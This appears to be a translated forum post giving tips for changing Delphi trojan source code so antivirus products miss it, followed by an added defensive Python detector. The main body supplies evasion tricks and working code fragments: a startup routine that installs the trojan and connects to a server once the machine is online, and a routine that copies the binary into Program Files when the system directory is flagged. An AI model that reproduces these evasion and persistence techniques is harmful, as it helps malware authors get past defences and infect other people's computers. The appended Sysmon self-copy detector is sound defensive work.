Modifying Trojan Source Code to Evade Antivirus Detection
------------------------------------------
Some people add something like this for evasion:
------------------------------------------
begin
  asm // call the code directly from inline assembly so the source evades detection
    call test
end;

Procedure test;
asm
  nop
  nop
  nop
end;
------------------------------------------
I prefer it this way:
------------------------------------------
1. Run from the end of the program, e.g.

begin
  ReadSettings;
  Install;
  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end.
------------------------------------------
You can

Procedure Main;
begin
  ReadSettings;
  Install;
  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end;
------------------------------------------
Calling it directly is equivalent to the call you see in OllyDbg (OD):

begin
  Main;
end.
------------------------------------------
2. Add a unit and move some of the functions into it. Haha, the structure has changed but the functionality has not, so it is sure to evade detection.
------------------------------------------
3. If copying to the system directory gets detected, change it to copy to C:/Program Files instead.

function GetWinDir(): String; // get the system directory
var
  ResultDir: Array[1..64] of char;
  i: integer;
begin
  // pad the buffer with spaces; the caller trims the result
  for i := 1 to 64 do resultDir[i] := char($20);
  GetEnvironmentVariable('windir', @resultDir, 64);
  Result := resultDir;
end;
------------------------------------------
var myn, myn2: String;

myn := ExtractFilename(ParamStr(0));
myn2 := COPY(trim(GetWindir), 1, 2) + '/Program Files/' + myn; // copy itself to Program Files
if not FileExists(myn2) then
begin
  copyfile(pchar(ParamStr(0)), pchar(myn2), true);
end;
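
A defender's view of step 3, as an added example that is not part of the original post: restructuring the source changes the byte signature, but the binary still writes a copy of itself directly into the Program Files root, which file-creation telemetry records. The events below are constructed samples using the `Image` and `TargetFilename` fields of Sysmon Event ID 11; the verdict names and the extension list are assumptions of this example.

```python
import ntpath

# Constructed sample events, shaped like Sysmon Event ID 11 (FileCreate) fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\Downloads\update.exe",
     "TargetFilename": r"C:\Program Files\update.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Program Files\Vendor\App\app.exe"},
    {"Image": r"D:\tools\setup.exe",
     "TargetFilename": "D:/Program Files/helper.exe"},
    {"Image": r"C:\Users\bob\Downloads\update.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\log.txt"},
]

ROOTS = {"program files", "program files (x86)"}
EXEC_EXT = {".exe", ".dll", ".scr", ".com"}  # assumed list for this example


def _norm(path):
    # The page's code builds the path with forward slashes; normalise both forms.
    return ntpath.normpath(path.replace("/", "\\")).lower()


def classify(event):
    """Return None, 'root-drop' or 'self-copy' for one file-creation event."""
    target = _norm(event["TargetFilename"])
    image = _norm(event["Image"])
    _drive, rest = ntpath.splitdrive(target)
    parts = [p for p in rest.split("\\") if p]
    # Only files written directly into the Program Files root are of interest:
    # installers normally write into a vendor subdirectory.
    if len(parts) != 2 or parts[0] not in ROOTS:
        return None
    if ntpath.splitext(parts[1])[1] not in EXEC_EXT:
        return None
    # Same file name as the writing process: the binary is copying itself.
    if ntpath.basename(image) == parts[1]:
        return "self-copy"
    return "root-drop"


def scan(events):
    """Return (target path, verdict) for every event that is flagged."""
    return [(e["TargetFilename"], v) for e in events if (v := classify(e))]


if __name__ == "__main__":
    for target, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:10} {target}")
```
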